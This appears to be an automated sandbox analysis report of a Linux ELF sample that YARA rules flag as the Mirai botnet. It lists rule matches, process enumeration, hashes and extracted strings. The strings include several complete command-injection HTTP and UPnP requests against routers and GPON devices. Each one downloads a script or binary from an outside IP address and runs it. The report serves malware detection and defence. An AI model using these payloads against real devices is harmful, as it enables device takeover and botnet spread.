Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+;sh+Jaws.sh HTTP/1.1
Source: Initial sample	Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0

Source: classification engine

Classification label: mal76.troj.lin@0/0@0/0

Enumerates processes within the "proc" file system

Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6236/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2033/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2275/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6195/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6194/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1612/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2028/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3236/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2025/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2146/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6227/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/759/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/761/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1622/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1983/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1344/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2156/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1629/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1627/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1900/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/491/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2050/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1877/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/772/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1633/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1632/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/774/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1872/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2048/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4466/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4467/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4468/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4469/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4502/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/936/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1639/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1638/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1809/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1890/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2063/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2062/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1888/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1886/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/785/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1642/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/788/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/667/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/789/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1648/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4491/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/4498/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6158/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2078/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2077/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2074/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2195/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/670/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2746/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/793/exe	Jump to behavior

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: tknjinyyHK, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: tknjinyyHK, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY

ID:	679630
Product:	CloudBasic
Start time:	07:26:25
Start date:	06.08.2022
Sample:	tknjinyyHK
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	207b92b6ce447a8be88fee4f5ab257d6
SHA1:	a2b8c7518f370a978dda19ade031c9d1885acb5e
SHA256:	7274ee8cc094cdfcab48b23978837b12d01bd426202f34d7191e0f6fc3ae18d3
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report
tknjinyyHK

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report tknjinyyHK

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report
tknjinyyHK